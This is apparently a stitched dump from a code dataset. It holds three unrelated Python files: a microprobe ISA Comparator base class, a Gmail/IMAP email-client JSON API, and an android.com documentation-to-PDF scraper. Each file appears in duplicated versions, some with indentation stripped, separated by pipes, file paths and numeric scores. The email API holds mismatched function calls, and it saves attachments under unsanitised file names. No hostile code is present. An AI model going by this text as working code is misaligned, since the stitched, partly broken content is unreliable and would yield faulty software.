comparison would be placed is returned.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
"""
raise NotImplementedError
@abc.abstractmethod
def generate(self, reg, value, helper_instr):
"""Generate the :class:`~.Instruction` to perform
the comparison. If the required instruction is found within
the :class:`~.list` of :class:`~.Instruction`
*helper_instr*, no new instruction is generated and the matching
instruction operands are set accordingly.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
:param helper_instr: List of helper instructions.
:type helper_instr: :class:`~.list` of :class`~.Instruction`
instances.
"""
raise NotImplementedError
@abc.abstractproperty
def instr_name(self):
"""Value comparator name, usually the opcode of the instruction it
uses (:class:`~.str`).
"""
raise NotImplementedError
@property
def arch(self):
"""Architecture on this :class:`~.Comparator` will work on
(:class:`~.ISA`).
"""
return self._arch | src/microprobe/target/isa/comparator.py | # Futures
from __future__ import absolute_import
# Built-in modules
import abc
# Third party modules
import six
# Own modules
from microprobe.exceptions import MicroprobeArchitectureDefinitionError
from microprobe.utils.imp import find_subclasses
from microprobe.utils.logger import get_logger
# Constants
LOG = get_logger(__name__)
__all__ = ["import_classes_from", "Comparator"]
# Functions
def import_classes_from(modules):
"""
:param modules:
"""
LOG.info("Start")
classes = {}
for module_str in modules:
for cls in find_subclasses(module_str, Comparator):
name = cls.__name__
if name in classes:
raise MicroprobeArchitectureDefinitionError(
"Duplicated "
"definition"
" of Comparator '%s' "
"in module '%s'" % (name, module_str)
)
LOG.info("%s comparator imported", name)
classes[name] = cls
if len(classes) == 0:
LOG.warning("No comparators imported.")
LOG.info("End")
return list(classes.values())
# Classes
class Comparator(six.with_metaclass(abc.ABCMeta, object)):
"""Abstract class to perform comparisons. :class:`~.Comparator`
objects are in charge of performing comparisons between values
while providing an architecture independent and modular interface.
They are registered in an :class:`~.ISA` object using the
:meth:`~.ISA.register_value_comparator`.
Once registered, whenever a comparison is needed to perform a
given operation, it is possible to check (:meth:`check`) if
the :class:`~.Comparator` can perform the requested comparison,
and if so, it can generate (:meth:`generate`) the required
:class:`~.list` of :class:`~.Instruction` to perform it.
:param isa: Architecture to operate on.
"""
def __init__(self, arch):
"""
:param arch:
"""
self._arch = arch
@abc.abstractmethod
def check(self, reg, value):
"""Checks whether the :class:`~.Register` *reg* instance can
be compared with the *value*, which can be a ::class:`~.int` or another
:class:`~.Register`. If is not possible to perform the
comparison, a `None` value is returned. Otherwise, the
:class:`~.Register` instance where the result of the
comparison would be placed is returned.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
"""
raise NotImplementedError
@abc.abstractmethod
def generate(self, reg, value, helper_instr):
"""Generate the :class:`~.Instruction` to perform
the comparison. If the required instruction is found within
the :class:`~.list` of :class:`~.Instruction`
*helper_instr*, no new instruction is generated and the matching
instruction operands are set accordingly.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
:param helper_instr: List of helper instructions.
:type helper_instr: :class:`~.list` of :class`~.Instruction`
instances.
"""
raise NotImplementedError
@abc.abstractproperty
def instr_name(self):
"""Value comparator name, usually the opcode of the instruction it
uses (:class:`~.str`).
"""
raise NotImplementedError
@property
def arch(self):
"""Architecture on this :class:`~.Comparator` will work on
(:class:`~.ISA`).
"""
return self._arch | 0.723895 | 0.311728 |
import json
import logging
import os
import quopri
import re
import smtplib
import subprocess
import sys
import threading
from base64 import b64decode
from email import policy
from email.header import Header, decode_header
from email.mime.text import MIMEText
from email.parser import BytesParser, BytesHeaderParser
from email.utils import formataddr, formatdate, make_msgid
logging.basicConfig(filename="/tmp/iris-api.log", format="[%(asctime)s] %(message)s", level=logging.INFO, datefmt="%Y-%m-%d %H:%M:%S")
imap_client = None
imap_host = imap_port = imap_login = imap_passwd = None
smtp_host = smtp_port = smtp_login = smtp_passwd = None
no_reply_pattern = r"^.*no[\-_ t]*reply"
def get_service():
# Stolen from quickstart.py
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = [
'https://www.googleapis.com/auth/gmail.readonly',
'https://www.googleapis.com/auth/gmail.send'
]
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('gmail', 'v1', credentials=creds)
return service
def get_contacts():
contacts = set()
fetch = imap_client.fetch("1:*", ["ENVELOPE"])
for [_, data] in fetch.items():
envelope = data[b"ENVELOPE"]
contacts = contacts.union(decode_contacts(envelope.to))
return list(contacts)
def get_emails(last_seq, chunk_size, service):
# TODO wire last_seq to pageToken, chunk_size to maxResults
emails = []
if last_seq == 0:
return emails
msg_ids = service.users().messages().list(userId='me', maxResults=50, pageToken=None).execute()
HDRS = ['From', 'To', 'Subject', 'Date', 'Message-ID', 'Reply-To']
for msg in msg_ids['messages']:
msg = service.users().messages().get(userId='me', id=msg['id'], format='metadata', metadataHeaders=HDRS).execute()
email = dict(id=msg['id'])
for hdr in msg['payload']['headers']:
email[hdr['name'].lower()] = hdr['value']
#TODO Flags / has_attachment
email["flags"] = "" # get_flags_str(data[b"FLAGS"], has_attachment)
emails.insert(0, email)
return emails
def get_email(id, format, service):
import base64
msg = service.users().messages().get(userId='me', id=id).execute()
#content = get_email_content(id, fetch.popitem()[1][b"BODY[]"])
if 'data' in msg['payload']['body'] :
payload = msg['payload']['body']['data']
else :
payload = msg['payload']['parts'][0]['body']['data']
return base64.urlsafe_b64decode( payload )
def get_flags_str(flags, has_attachment):
flags_str = ""
flags_str += "N" if not b"\\Seen" in flags else " "
flags_str += "R" if b"\\Answered" in flags else " "
flags_str += "F" if b"\\Flagged" in flags else " "
flags_str += "D" if b"\\Draft" in flags else " "
flags_str += "@" if has_attachment else " "
return flags_str
def download_attachments(dir, uid, data):
attachments = []
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_attachment():
attachment_name = part.get_filename()
attachment = open(os.path.expanduser(os.path.join(dir, attachment_name)), "wb")
attachment.write(part.get_payload(decode=True))
attachment.close()
attachments.append(attachment_name)
return attachments
def get_email_content(uid, data):
content = dict(text=None, html=None)
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_multipart():
continue
if part.get_content_type() == "text/plain":
content["text"] = read_text(part)
continue
if part.get_content_type() == "text/html":
content["html"] = read_html(part, uid)
continue
if content["html"] and not content["text"]:
tmp = open(content["html"], "r")
content["text"] = tmp.read()
tmp.close()
return content
def read_text(part):
payload = part.get_payload(decode=True)
return payload.decode(part.get_charset() or part.get_content_charset() or "utf-8")
def read_html(part, uid):
payload = read_text(part)
preview = write_preview(payload.encode(), uid)
return preview
def write_preview(payload, uid, subtype="html"):
preview = "/tmp/preview-%d.%s" % (uid, subtype)
if not os.path.exists(preview):
tmp = open(preview, "wb")
tmp.write(payload)
tmp.close()
return preview
def decode_byte(byte):
decode_list = decode_header(byte.decode())
def _decode_byte(byte_or_str, encoding):
return byte_or_str.decode(encoding or "utf-8") if type(byte_or_str) is bytes else byte_or_str
return "".join([_decode_byte(val, encoding) for val, encoding in decode_list])
def decode_contacts(contacts):
return list(filter(None.__ne__, [decode_contact(c) for c in contacts or []]))
def decode_contact(contact):
if not contact.mailbox or not contact.host: return None
mailbox = decode_byte(contact.mailbox)
if re.match(no_reply_pattern, mailbox): return None
host = decode_byte(contact.host)
if re.match(no_reply_pattern, host): return None
return "@".join([mailbox, host]).lower()
if __name__ == '__main__':
import fire
fire.Fire()
sys.exit(0)
def api():
service = None
while True:
request_raw = sys.stdin.readline()
try: request = json.loads(request_raw.rstrip())
except: continue
logging.info("Receive: " + str({key: request[key] for key in request if key not in ["imap-passwd", "smtp-passwd"]}))
if request["type"] == "login":
try:
service = get_service()
results = service.users().labels().list(userId='me').execute()
folders = results.get('labels', [])
response = dict(success=True, type="login", folders=folders)
except Exception as error:
response = dict(success=False, type="login", error=str(error))
elif request["type"] == "fetch-emails":
try:
emails = get_emails(request["seq"], request["chunk-size"], service)
response = dict(success=True, type="fetch-emails", emails=emails)
except Exception as error:
response = dict(success=False, type="fetch-emails", error=str(error))
elif request["type"] == "fetch-email":
try:
email = get_email(request["id"], request["format"])
response = dict(success=True, type="fetch-email", email=email, format=request["format"])
except Exception as error:
response = dict(success=False, type="fetch-email", error=str(error))
elif request["type"] == "download-attachments":
try:
fetch = imap_client.fetch([request["id"]], ["BODY[]"])
attachments = download_attachments(request["dir"], request["id"], fetch.popitem()[1][b"BODY[]"])
response = dict(success=True, type="download-attachments", attachments=attachments)
except Exception as error:
response = dict(success=False, type="download-attachments", error=str(error))
elif request["type"] == "select-folder":
try:
folder = request["folder"]
seq = imap_client.select_folder(folder)[b"UIDNEXT"]
emails = get_emails(seq, request["chunk-size"])
is_folder_selected = True
response = dict(success=True, type="select-folder", folder=folder, seq=seq, emails=emails)
except Exception as error:
response = dict(success=False, type="select-folder", error=str(error))
elif request["type"] == "send-email":
try:
message = MIMEText(request["message"])
for key, val in request["headers"].items(): message[key] = val
message["From"] = formataddr((request["from"]["name"], request["from"]["email"]))
message["Message-Id"] = make_msgid()
smtp = smtplib.SMTP(host=smtp_host, port=smtp_port)
smtp.starttls()
smtp.login(smtp_login, smtp_passwd)
smtp.send_message(message)
smtp.quit()
imap_client.append("Sent", message.as_string())
contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "a")
contacts_file.write(request["headers"]["To"] + "\n")
contacts_file.close()
response = dict(success=True, type="send-email")
except Exception as error:
response = dict(success=False, type="send-email", error=str(error))
elif request["type"] == "extract-contacts":
try:
contacts = get_contacts()
contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "w+")
for contact in contacts: contacts_file.write(contact + "\n")
contacts_file.close()
response = dict(success=True, type="extract-contacts")
except Exception as error:
response = dict(success=False, type="extract-contacts", error=str(error))
json_response = json.dumps(response)
logging.info("Send: " + str(json_response))
sys.stdout.write(json_response + "\n")
sys.stdout.flush() | api.py |
import json
import logging
import os
import quopri
import re
import smtplib
import subprocess
import sys
import threading
from base64 import b64decode
from email import policy
from email.header import Header, decode_header
from email.mime.text import MIMEText
from email.parser import BytesParser, BytesHeaderParser
from email.utils import formataddr, formatdate, make_msgid
logging.basicConfig(filename="/tmp/iris-api.log", format="[%(asctime)s] %(message)s", level=logging.INFO, datefmt="%Y-%m-%d %H:%M:%S")
imap_client = None
imap_host = imap_port = imap_login = imap_passwd = None
smtp_host = smtp_port = smtp_login = smtp_passwd = None
no_reply_pattern = r"^.*no[\-_ t]*reply"
def get_service():
# Stolen from quickstart.py
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = [
'https://www.googleapis.com/auth/gmail.readonly',
'https://www.googleapis.com/auth/gmail.send'
]
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('gmail', 'v1', credentials=creds)
return service
def get_contacts():
contacts = set()
fetch = imap_client.fetch("1:*", ["ENVELOPE"])
for [_, data] in fetch.items():
envelope = data[b"ENVELOPE"]
contacts = contacts.union(decode_contacts(envelope.to))
return list(contacts)
def get_emails(last_seq, chunk_size, service):
# TODO wire last_seq to pageToken, chunk_size to maxResults
emails = []
if last_seq == 0:
return emails
msg_ids = service.users().messages().list(userId='me', maxResults=50, pageToken=None).execute()
HDRS = ['From', 'To', 'Subject', 'Date', 'Message-ID', 'Reply-To']
for msg in msg_ids['messages']:
msg = service.users().messages().get(userId='me', id=msg['id'], format='metadata', metadataHeaders=HDRS).execute()
email = dict(id=msg['id'])
for hdr in msg['payload']['headers']:
email[hdr['name'].lower()] = hdr['value']
#TODO Flags / has_attachment
email["flags"] = "" # get_flags_str(data[b"FLAGS"], has_attachment)
emails.insert(0, email)
return emails
def get_email(id, format, service):
import base64
msg = service.users().messages().get(userId='me', id=id).execute()
#content = get_email_content(id, fetch.popitem()[1][b"BODY[]"])
if 'data' in msg['payload']['body'] :
payload = msg['payload']['body']['data']
else :
payload = msg['payload']['parts'][0]['body']['data']
return base64.urlsafe_b64decode( payload )
def get_flags_str(flags, has_attachment):
flags_str = ""
flags_str += "N" if not b"\\Seen" in flags else " "
flags_str += "R" if b"\\Answered" in flags else " "
flags_str += "F" if b"\\Flagged" in flags else " "
flags_str += "D" if b"\\Draft" in flags else " "
flags_str += "@" if has_attachment else " "
return flags_str
def download_attachments(dir, uid, data):
attachments = []
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_attachment():
attachment_name = part.get_filename()
attachment = open(os.path.expanduser(os.path.join(dir, attachment_name)), "wb")
attachment.write(part.get_payload(decode=True))
attachment.close()
attachments.append(attachment_name)
return attachments
def get_email_content(uid, data):
content = dict(text=None, html=None)
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_multipart():
continue
if part.get_content_type() == "text/plain":
content["text"] = read_text(part)
continue
if part.get_content_type() == "text/html":
content["html"] = read_html(part, uid)
continue
if content["html"] and not content["text"]:
tmp = open(content["html"], "r")
content["text"] = tmp.read()
tmp.close()
return content
def read_text(part):
payload = part.get_payload(decode=True)
return payload.decode(part.get_charset() or part.get_content_charset() or "utf-8")
def read_html(part, uid):
payload = read_text(part)
preview = write_preview(payload.encode(), uid)
return preview
def write_preview(payload, uid, subtype="html"):
preview = "/tmp/preview-%d.%s" % (uid, subtype)
if not os.path.exists(preview):
tmp = open(preview, "wb")
tmp.write(payload)
tmp.close()
return preview
def decode_byte(byte):
decode_list = decode_header(byte.decode())
def _decode_byte(byte_or_str, encoding):
return byte_or_str.decode(encoding or "utf-8") if type(byte_or_str) is bytes else byte_or_str
return "".join([_decode_byte(val, encoding) for val, encoding in decode_list])
def decode_contacts(contacts):
return list(filter(None.__ne__, [decode_contact(c) for c in contacts or []]))
def decode_contact(contact):
if not contact.mailbox or not contact.host: return None
mailbox = decode_byte(contact.mailbox)
if re.match(no_reply_pattern, mailbox): return None
host = decode_byte(contact.host)
if re.match(no_reply_pattern, host): return None
return "@".join([mailbox, host]).lower()
if __name__ == '__main__':
import fire
fire.Fire()
sys.exit(0)
def api():
    """Serve a JSON line protocol on stdin/stdout.

    Each request is one JSON object per line carrying a "type" field;
    each response is one JSON object per line echoing that type plus a
    "success" flag. Relies on module globals (imap_client, smtp_host,
    smtp_login, ...) defined elsewhere in this file.
    """
    service = None
    while True:
        request_raw = sys.stdin.readline()
        # Silently skip lines that are not valid JSON.
        try: request = json.loads(request_raw.rstrip())
        except: continue
        # Strip credentials before logging.
        logging.info("Receive: " + str({key: request[key] for key in request if key not in ["imap-passwd", "smtp-passwd"]}))
        if request["type"] == "login":
            try:
                service = get_service()
                results = service.users().labels().list(userId='me').execute()
                folders = results.get('labels', [])
                response = dict(success=True, type="login", folders=folders)
            except Exception as error:
                response = dict(success=False, type="login", error=str(error))
        elif request["type"] == "fetch-emails":
            try:
                emails = get_emails(request["seq"], request["chunk-size"], service)
                response = dict(success=True, type="fetch-emails", emails=emails)
            except Exception as error:
                response = dict(success=False, type="fetch-emails", error=str(error))
        elif request["type"] == "fetch-email":
            try:
                email = get_email(request["id"], request["format"])
                response = dict(success=True, type="fetch-email", email=email, format=request["format"])
            except Exception as error:
                response = dict(success=False, type="fetch-email", error=str(error))
        elif request["type"] == "download-attachments":
            try:
                # Fetch the full RFC 822 body and extract its attachments.
                fetch = imap_client.fetch([request["id"]], ["BODY[]"])
                attachments = download_attachments(request["dir"], request["id"], fetch.popitem()[1][b"BODY[]"])
                response = dict(success=True, type="download-attachments", attachments=attachments)
            except Exception as error:
                response = dict(success=False, type="download-attachments", error=str(error))
        elif request["type"] == "select-folder":
            try:
                folder = request["folder"]
                # UIDNEXT is the next sequence number of the selected folder.
                seq = imap_client.select_folder(folder)[b"UIDNEXT"]
                # NOTE(review): unlike "fetch-emails" above, no service
                # argument is passed here -- confirm intended.
                emails = get_emails(seq, request["chunk-size"])
                is_folder_selected = True
                response = dict(success=True, type="select-folder", folder=folder, seq=seq, emails=emails)
            except Exception as error:
                response = dict(success=False, type="select-folder", error=str(error))
        elif request["type"] == "send-email":
            try:
                message = MIMEText(request["message"])
                for key, val in request["headers"].items(): message[key] = val
                message["From"] = formataddr((request["from"]["name"], request["from"]["email"]))
                message["Message-Id"] = make_msgid()
                smtp = smtplib.SMTP(host=smtp_host, port=smtp_port)
                smtp.starttls()
                smtp.login(smtp_login, smtp_passwd)
                smtp.send_message(message)
                smtp.quit()
                # Mirror the sent message into the IMAP "Sent" folder.
                imap_client.append("Sent", message.as_string())
                # Remember the recipient for later address completion.
                contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "a")
                contacts_file.write(request["headers"]["To"] + "\n")
                contacts_file.close()
                response = dict(success=True, type="send-email")
            except Exception as error:
                response = dict(success=False, type="send-email", error=str(error))
        elif request["type"] == "extract-contacts":
            try:
                contacts = get_contacts()
                contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "w+")
                for contact in contacts: contacts_file.write(contact + "\n")
                contacts_file.close()
                response = dict(success=True, type="extract-contacts")
            except Exception as error:
                response = dict(success=False, type="extract-contacts", error=str(error))
        # NOTE(review): an unknown "type" re-sends the previous response
        # (or raises NameError on the very first request) -- confirm intended.
        json_response = json.dumps(response)
        logging.info("Send: " + str(json_response))
        sys.stdout.write(json_response + "\n")
        sys.stdout.flush()
import argparse
import os
import resource
import subprocess
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup as bs
from PyPDF2 import PdfFileReader, PdfFileWriter
import requests
# Use html5lib because html.parser makes a mess of malformed HTML
PARSER = 'html5lib'
def remove_wayback_header(url):
    '''
    If the URL is a Wayback Machine URL, modify the URL to hide the
    Wayback Machine toolbar (insert the 'if_' flag before the archived
    URL); otherwise return it unchanged.

    Bug fix: the original test `not url.find('web.archive.org')` was only
    true when the substring sat at index 0 -- str.find returns -1 (truthy)
    when absent, so ordinary URLs fell through and were corrupted by the
    splice below.
    '''
    if 'web.archive.org' not in url:
        return url
    spot = url.find('/http')
    if spot == -1:
        # Defensive: a wayback URL without an embedded target URL.
        return url
    return url[:spot] + 'if_' + url[spot:]
def save_url_to_pdf(url, file_name):
    '''
    Render the URL to the specified PDF file with headless Chrome
    '''
    target = remove_wayback_header(url)
    command = ('google-chrome', '--headless',
               '--print-to-pdf=' + file_name, target)
    subprocess.run(command, stderr=subprocess.DEVNULL, check=True)
def url_to_filename(url):
    '''
    Convert URL to a filesystem-safe file name by replacing every
    unsafe character with an underscore
    '''
    name = url[url.find('//') + 2:]
    unsafe = '"!/. ?=:\''
    return name.translate(str.maketrans(unsafe, '_' * len(unsafe)))
class PdfOutput:
    '''
    Save URLs to PDF and accumulate into one output file
    '''
    class Bookmark: # pylint: disable=too-few-public-methods
        '''
        Represents a bookmark for a heading
        '''
        def __init__(self, title, *, indent=True):
            self.title = title
            # PDF outline reference, filled in once the bookmark is written
            self.pdf_ref = None
            # False marks a non-nesting (italic) heading
            self.indent = indent
        def is_pending(self):
            '''
            Check whether the bookmark has been added or not
            '''
            return self.pdf_ref is None
    def __init__(self, file_name, *, delay=1, no_exec=False):
        # file_name: final merged PDF; delay: seconds between page fetches;
        # no_exec: dry run -- print actions instead of rendering
        self.file_name = file_name
        self.delay = delay
        self.no_exec = no_exec
        self.writer = PdfFileWriter()
        self.files_to_clean_up = []
        self.bookmark_stack = []
    def add_heading(self, bookmark_title):
        '''
        Add a heading (non-nesting: it does not become the parent of
        later bookmarks)
        '''
        self.bookmark_stack.append(self.Bookmark(bookmark_title, indent=False))
    def add_page(self, url, bookmark_title, *, bookmark=True):
        '''
        Add the URL to the PDF
        '''
        # Linked PDF documents are skipped (Chrome renders pages, not PDFs).
        if url.endswith('.pdf'):
            return
        # Throttle requests to be polite to the server.
        time.sleep(self.delay)
        file_name = self.make_unique_filename_ext(url_to_filename(url), '.pdf')
        if self.no_exec:
            print('Adding page', url)
        else:
            save_url_to_pdf(url, file_name)
            # NOTE(review): indentation reconstructed -- appending and
            # bookmarking only make sense when the page PDF was produced.
            page_index = self.writer.getNumPages()
            self.append_pdf_to_output(file_name)
            self.create_pending_bookmarks(page_index)
            if bookmark:
                self.bookmark_page(bookmark_title, page_index)
    def append_pdf_to_output(self, file_name):
        '''
        Append the PDF file to the output, remember file to clean up
        '''
        # NOTE(review): the handle is never closed; PdfFileReader reads
        # pages lazily, so presumably it must stay open until
        # write_output() -- likely why main() raises RLIMIT_NOFILE.
        input_file = open(file_name, 'rb')
        input_stream = PdfFileReader(input_file)
        self.writer.appendPagesFromReader(input_stream)
        self.files_to_clean_up.append(file_name)
    def bookmark_page(self, title, page_num):
        '''
        Bookmark the page, nested under the innermost heading if any
        '''
        parent = None
        if self.bookmark_stack:
            parent = self.bookmark_stack[-1].pdf_ref
        self.writer.addBookmark(title, page_num, parent=parent)
    def clean_up_files(self):
        '''
        Delete all the files to be cleaned-up
        '''
        for file in self.files_to_clean_up:
            os.remove(file)
    def create_pending_bookmarks(self, page_num):
        '''
        Create heading bookmarks that have not yet been created, pointing
        them at page_num and chaining parents while descending the stack
        '''
        parent = None
        for bookmark in self.bookmark_stack:
            if bookmark.is_pending():
                bookmark.pdf_ref = self.writer.addBookmark(
                    bookmark.title, page_num, parent=parent,
                    italic=not bookmark.indent)
            if bookmark.indent:
                parent = bookmark.pdf_ref
    def finish(self):
        '''
        Wrap-up processing by writing the output file and cleaning-up
        '''
        if not self.no_exec:
            self.write_output()
        self.clean_up_files()
    def make_unique_filename_ext(self, file_name, ext):
        '''
        Check a file name and extension for uniqueness and append
        a numeric suffix if necessary to make it unique
        '''
        suffix = 2
        tentative_name = file_name
        while tentative_name + ext in self.files_to_clean_up:
            tentative_name = file_name + str(suffix)
            suffix += 1
        return tentative_name + ext
    def pop_heading(self):
        '''
        Outdent subsequent bookmarks: drop the current heading and any
        non-indenting headings directly below it
        '''
        self.bookmark_stack.pop()
        while self.bookmark_stack and \
                (not self.bookmark_stack[-1].indent):
            self.bookmark_stack.pop()
    def push_heading(self, bookmark_title):
        '''
        Add a heading and make subsequent bookmarks a child of
        this heading
        '''
        self.bookmark_stack.append(self.Bookmark(bookmark_title))
    def write_output(self):
        '''
        Generate the output file
        '''
        output_file = open(self.file_name, 'wb')
        self.writer.write(output_file)
        output_file.close()
def title_to_bookmark_title(title):
    '''
    Extract the bookmark name from a page title: the part before the
    first '|' separator, stripped of surrounding whitespace.

    Bug fix: str.find returns -1 (truthy) when '|' is absent, so the
    original `if not vertical_bar` fell through and chopped the last two
    characters off separator-less titles; `[:vertical_bar - 1]` also
    dropped one character too many before the bar.
    '''
    vertical_bar = title.find('|')
    if vertical_bar == -1:
        return title
    return title[:vertical_bar].strip()
def read_page(url):
    '''
    Fetch the page at url and return its parsed soup; raises on HTTP
    errors
    '''
    reply = requests.get(url)
    reply.raise_for_status()
    return bs(reply.text, PARSER)
def url_to_absolute(site_url, page_url):
    '''
    Resolve page_url against site_url when it is relative; absolute
    URLs pass through unchanged
    '''
    return urljoin(site_url, page_url)
def scrape_side_menu_item(site_url, item, output):
    '''
    Scrape one side-menu entry.

    Expandable entries become a heading whose sub-entries are scraped
    recursively; leaf entries are saved as a single bookmarked page.
    '''
    if 'devsite-nav-item-section-expandable' not in item['class']:
        link = item.find('a')
        output.add_page(url_to_absolute(site_url, link['href']),
                        link.text.strip())
        return
    label = item.find('span')
    output.push_heading(label.text.strip())
    for child in item.find('ul').find_all('li', recursive=False):
        scrape_side_menu_item(site_url, child, output)
    output.pop_heading()
def scrape_upper_tab(site_url, tab, output):
    '''
    Scrape a major section, represented by an upper tab.

    When the tab's page carries a side menu, each chapter is scraped
    under a new heading; otherwise the tab page itself is saved.
    '''
    link = tab.find('a')
    tab_url = link['href']
    page = read_page(url_to_absolute(site_url, tab_url))
    nav = page.select_one('nav.devsite-section-nav')
    side_menu = nav.select_one('ul.devsite-nav-list') if nav else None
    if not side_menu:
        output.add_page(url_to_absolute(site_url, tab_url),
                        title_to_bookmark_title(page.title.string))
        return
    output.push_heading(link.text.strip())
    for entry in side_menu.find_all('li', recursive=False):
        scrape_side_menu_item(site_url, entry, output)
    output.pop_heading()
def scrape_site(url, output):
    '''
    Scrape the whole site: save the main page first, then iterate
    through every upper tab
    '''
    page = read_page(url)
    output.push_heading(page.title.string.strip())
    output.add_page(url, url, bookmark=False)
    upper_tabs = (tab
                  for container in page.select('div.devsite-header-upper-tabs')
                  for tab in container.find_all('li'))
    for tab in upper_tabs:
        scrape_upper_tab(url, tab, output)
    output.pop_heading()
def parse_command_line():
    '''
    Parse the command line and return the options namespace
    '''
    parser = argparse.ArgumentParser('Scrape an android.com site to PDF')
    parser.add_argument('url', type=str, metavar='URL')
    parser.add_argument(
        '-o', '--output', type=str, metavar='OUTPUT',
        default='scraper.pdf', help='output file name')
    parser.add_argument(
        '--delay', type=int, default=1, metavar='DELAY',
        help='delay in seconds between requests')
    parser.add_argument(
        '-N', '--no-exec', action='store_true',
        help="don't execute, just show what would be done")
    return parser.parse_args()
def main():
    '''
    Entry point: parse options, scrape the site, write the PDF
    '''
    try:
        options = parse_command_line()
        # developer.android.com causes "too many open files" otherwise
        resource.setrlimit(resource.RLIMIT_NOFILE, (10000, 10000))
        pdf = PdfOutput(options.output, no_exec=options.no_exec,
                        delay=options.delay)
        scrape_site(options.url, pdf)
        pdf.finish()
        print('Done')
    except KeyboardInterrupt:
        print('Cancelled')
main() | android_scraper_2018.py | import argparse
import os
import resource
import subprocess
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup as bs
from PyPDF2 import PdfFileReader, PdfFileWriter
import requests
# Use html5lib because html.parser makes a mess of malformed HTML
PARSER = 'html5lib'
def remove_wayback_header(url):
    '''
    If the URL is a Wayback Machine URL, modify the URL to hide the
    Wayback Machine toolbar (insert the 'if_' flag before the archived
    URL); otherwise return it unchanged.

    Bug fix: the original test `not url.find('web.archive.org')` was only
    true when the substring sat at index 0 -- str.find returns -1 (truthy)
    when absent, so ordinary URLs fell through and were corrupted by the
    splice below.
    '''
    if 'web.archive.org' not in url:
        return url
    spot = url.find('/http')
    if spot == -1:
        # Defensive: a wayback URL without an embedded target URL.
        return url
    return url[:spot] + 'if_' + url[spot:]
def save_url_to_pdf(url, file_name):
'''
Save the URL to the specified PDF file
'''
url = remove_wayback_header(url)
subprocess.run(('google-chrome', '--headless', '--print-to-pdf=' + \
file_name, url), stderr=subprocess.DEVNULL, check=True)
def url_to_filename(url):
'''
Convert URL to filename
'''
name = url[url.find('//') + 2:]
for char in '"!/. ?=:\'':
name = name.replace(char, '_')
return name
class PdfOutput:
'''
Save URLs to PDF and accumulate into one output file
'''
class Bookmark: # pylint: disable=too-few-public-methods
'''
Represents a bookmark for a heading
'''
def __init__(self, title, *, indent=True):
self.title = title
self.pdf_ref = None
self.indent = indent
def is_pending(self):
'''
Check whether the bookmark has been added or not
'''
return self.pdf_ref is None
def __init__(self, file_name, *, delay=1, no_exec=False):
self.file_name = file_name
self.delay = delay
self.no_exec = no_exec
self.writer = PdfFileWriter()
self.files_to_clean_up = []
self.bookmark_stack = []
def add_heading(self, bookmark_title):
'''
Add a heading
'''
self.bookmark_stack.append(self.Bookmark(bookmark_title, indent=False))
def add_page(self, url, bookmark_title, *, bookmark=True):
'''
Add the URL to the PDF
'''
if url.endswith('.pdf'):
return
time.sleep(self.delay)
file_name = self.make_unique_filename_ext(url_to_filename(url), '.pdf')
if self.no_exec:
print('Adding page', url)
else:
save_url_to_pdf(url, file_name)
page_index = self.writer.getNumPages()
self.append_pdf_to_output(file_name)
self.create_pending_bookmarks(page_index)
if bookmark:
self.bookmark_page(bookmark_title, page_index)
def append_pdf_to_output(self, file_name):
'''
Append the PDF file to the output, remember file to clean up
'''
input_file = open(file_name, 'rb')
input_stream = PdfFileReader(input_file)
self.writer.appendPagesFromReader(input_stream)
self.files_to_clean_up.append(file_name)
def bookmark_page(self, title, page_num):
'''
Bookmark the page
'''
parent = None
if self.bookmark_stack:
parent = self.bookmark_stack[-1].pdf_ref
self.writer.addBookmark(title, page_num, parent=parent)
def clean_up_files(self):
'''
Delete all the files to be cleaned-up
'''
for file in self.files_to_clean_up:
os.remove(file)
def create_pending_bookmarks(self, page_num):
'''
Create heading bookmarks that have not yet been created
'''
parent = None
for bookmark in self.bookmark_stack:
if bookmark.is_pending():
bookmark.pdf_ref = self.writer.addBookmark( \
bookmark.title, page_num, parent=parent, \
italic=not bookmark.indent)
